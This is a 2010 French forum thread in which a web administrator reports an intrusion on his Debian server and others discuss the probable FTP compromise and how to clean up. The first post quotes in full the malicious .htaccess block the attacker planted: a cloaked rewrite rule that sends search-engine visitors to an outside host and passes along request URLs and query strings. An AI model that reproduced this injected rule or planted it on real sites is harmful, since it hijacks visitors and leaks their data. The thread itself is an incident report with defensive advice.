Piratage serveur

edmc73 · **Publié:** 18 Nov 2010 09:37

Bon ben pour je viens de m'apercevoir sur un de mes serveurs web, qu'un fichier .htaccess a été modifié par un pirate..

Il avait inclus :

Code:

# exgocgkctswo
RewriteEngine On
RewriteCond %{REQUEST_METHOD}   ^GET$
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?).*$   [NC]
RewriteCond %{HTTP_REFERER}     !^.*(q\=cache\:).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(WinHTTP|WinNT4|WordPress|WOW64|WWWeasel|wwwster|yacy|Yahoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$   [NC]
RewriteCond %{HTTP_COOKIE}      !^.*xccgtswgokoe.*$
RewriteCond %{HTTPS}            ^off$
RewriteRule ^(.*)$   http://luckyhosting.org/cgi-bin/r.cgi?p=9004&i=876c9b07&j=312&m=41933204bd6d98653ce17be86620f348&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME}  [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]
# exgocgkctswo

Je me demande vraiment comment il font pour écrire dans un fichier sans avoir aucun mot de passe....
Ca fou la trouille !!!!!

edmc73 · **Publié:** 18 Nov 2010 10:50

bon.. apparemment, le pirate aurait réussi a trouver le login et password ftp du serveur... comment je me le demande !!
et de copier 240 .htaccess dans chaque répertoire trouvé sur le serveur web !!
galère...

01 · **Publié:** 19 Nov 2010 03:34

Euh, ils provoquent quoi ces .htaccess modifiés ?
C'est un serveur sous Debian ? Il était mis à jour ?

edmc73 · **Publié:** 19 Nov 2010 09:40

serveur debian of course, a jour hmm.. ptete pas pile poil..
Je sais pas pourquoi j'avais installé un pure-ftpd directement avec les sources sans passer par aptitude.
Du coup ca fait chier pour le mettre a jour.
et c'est encore du debian etch, ca date ca nan ?

Le script la, il sert a récupérer l'url quand tu navigues sur le site.
Le pirate espèce, je pense, récupérer des mots de passe ou des hash de session qui se cacherait dans l'url.

111110101011 · **Publié:** 20 Nov 2010 15:17

Etch, c'est l'ancienne version stable, je ne sais pas quand Debian a cessé de supporter cette version, au pire y'a quelques années (1 ou 2 ans), ce qui est déjà pas mal.
J'ai maté dans les archives sécurité des dernières années, proftpd a connu quelques failles, mais qui n'avaient pas l'air d'être trop sérieuses (quoique), mais on peut sans doute gagner l'accès au FTP d'un moyen ou d'un autre.
Une fois un serveur une fois compromis y'a un petit paquet de choses à s'assurer, changer les mots de passe bien sûr mais aussi voir si y'a pas des backdoors qui trainent, la liste de ce qui a été touché si le mec a laissé des traces. Si c'est un serveur sensible je songerais ptet même à refaire une installation depuis 0 ... bon faut être un peu courageux.

	NAVIGATION : INDEX DU FORUM / ACCUEIL DE P2PFR / WIKI


Merci de faire une recherche avant de poster :)

Piratage serveur

Qui est en ligne ?